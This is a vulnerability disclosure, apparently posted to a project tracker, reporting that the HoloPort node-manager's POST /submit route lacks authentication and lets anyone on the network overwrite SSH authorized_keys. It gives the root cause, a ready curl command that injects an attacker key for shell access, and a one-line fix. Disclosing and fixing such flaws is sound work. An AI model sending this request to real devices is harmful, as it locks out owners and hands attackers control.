Security Disclosure: POST /submit auth bypass allows SSH key injection on already-onboarded HoloPort

[futurehelp]

SECURITY DISCLOSURE -- HoloPort node-manager POST /submit Auth Bypass (SSH Key Injection)

The node-manager service on every deployed HoloPort (port 8080) accepts unauthenticated POST requests to /submit after the node is already onboarded. An attacker on the same network can overwrite the owner's SSH authorized_keys file and gain full shell access.

Root cause: src/main.rs routing table applies is_authenticated to every management route except POST /submit. There is no state.onboarded guard either. write_ssh_keys at line 195 overwrites (not appends) the entire authorized_keys file.

Attack (one command, no auth):

curl -X POST http://<holo-node-ip>:8080/submit \
  -H "Content-Type: application/json" \
  -d '{"nodeName":"victim-node","sshKey":"ssh-ed25519 AAAA<attacker-key>","hwMode":"STANDARD"}'

Returns {"status":"ok"} on an already-onboarded node. Legitimate owner's SSH keys erased. Attacker gets full shell on HoloPort.

Severity: P2 (High) on LAN, Critical if port 8080 is internet-exposed.

Recommended fix: Add if state.onboarded { return 403; } at the top of handle_submit.

Coordinated disclosure. Requesting 90-day window before publishing.

-- Independent security researcher

[futurehelp]

@SIR-R0B -- tagging you directly.

POST /submit has no is_authenticated check and no state.onboarded guard. The route is permanently open on every deployed HoloPort after initial setup. Any attacker on the same LAN sends one unauthenticated POST and write_ssh_keys overwrites the entire authorized_keys file -- legitimate owner locked out, attacker has shell.

Verified locally: already-onboarded node returns {"status":"ok"} with no session cookie, no token, no challenge.

One-line fix: add if state.onboarded { return 403; } at the top of handle_submit in src/main.rs.